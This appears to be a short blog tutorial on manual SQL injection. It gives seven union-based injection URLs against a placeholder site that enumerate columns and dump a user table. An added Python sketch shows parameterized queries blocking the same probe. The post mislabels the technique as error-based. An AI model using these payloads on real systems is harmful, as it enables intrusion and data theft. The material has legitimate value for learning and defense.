The following commands can be used to get the information from the database:
- Maniesh Neupane
- Jan 31, 2022
1:
http://www.xyz.com/shell.php?id=10' --+
--+, -- -, # etc. are used to balance the query: they comment out the rest of the original statement. The main page should come back after inputting this.
2:
http://www.xyz.com/shell.php?id=10' order by 7 --+
order by is used to check the number of columns. It can be any number of columns (here, it's 7). One must check by trying different numbers one at a time.
3:
http://www.xyz.com/shell.php?id=-10' union select 1,2,3,4,5,6,7 --+
union select is used to find the actual position where database output appears in the page. Here it's 3.
4:
http://www.xyz.com/shell.php?id=-10' union select 1,2,database(),4,5,6,7 --+
To find the database name.
5:
http://www.xyz.com/shell.php?id=-10' union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.table_constraints --+
To find the tables.
6:
http://www.xyz.com/shell.php?id=-10' union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name = 'user' --+
To find the column names from the table 'user'.
7:
http://www.xyz.com/shell.php?id=-10' union select 1,2,group_concat(Kolkata),4,5,6,7 from user --+
To dump the data from the column 'Kolkata'.
This is how Error-based SQLi is performed manually.
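Every step above works only because the id value is pasted into the SQL text. The sketch below is an added example, not code from the original post or from the site in the URLs: it uses Python with an in-memory SQLite table as a stand-in for the page's PHP/MySQL back end, and the table, columns and function names are hypothetical. It runs step 3's value against a concatenated query and against a parameterized one.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data: one 7-column table, matching the column count above.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, c2, c3, c4, c5, c6, c7)")
    db.execute("INSERT INTO items VALUES (10, 'a', 'Widget', 'd', 'e', 'f', 'g')")
    return db

def lookup_vulnerable(db, raw_id):
    # The parameter is pasted into the SQL text, so a quote inside it closes
    # the string literal and whatever follows is parsed as SQL.
    return db.execute("SELECT * FROM items WHERE id = '" + raw_id + "'").fetchall()

def lookup_parameterized(db, raw_id):
    # The value is bound to a placeholder and travels separately from the SQL
    # text, so it can only ever be compared as data.
    return db.execute("SELECT * FROM items WHERE id = ?", (raw_id,)).fetchall()

def lookup_validated(db, raw_id):
    # Defence in depth: an id is an integer, so reject everything else early.
    if not re.fullmatch(r"-?[0-9]+", raw_id):
        raise ValueError("id must be an integer")
    return lookup_parameterized(db, int(raw_id))

# Step 3's value after URL decoding ('+' becomes a space).
PROBE = "-10' union select 1,2,3,4,5,6,7 -- "

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "10"))     # the legitimate row
    print(lookup_vulnerable(db, PROBE))    # the injected SELECT's row instead
    print(lookup_parameterized(db, PROBE)) # no rows: the probe is just a string
    try:
        lookup_validated(db, PROBE)
    except ValueError as exc:
        print("rejected:", exc)
```

With the placeholder version the quote, the union and the comment marker never reach the SQL parser, so none of the seven steps has anything to act on.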
Thank you!
Maniesh Neupane🇳🇵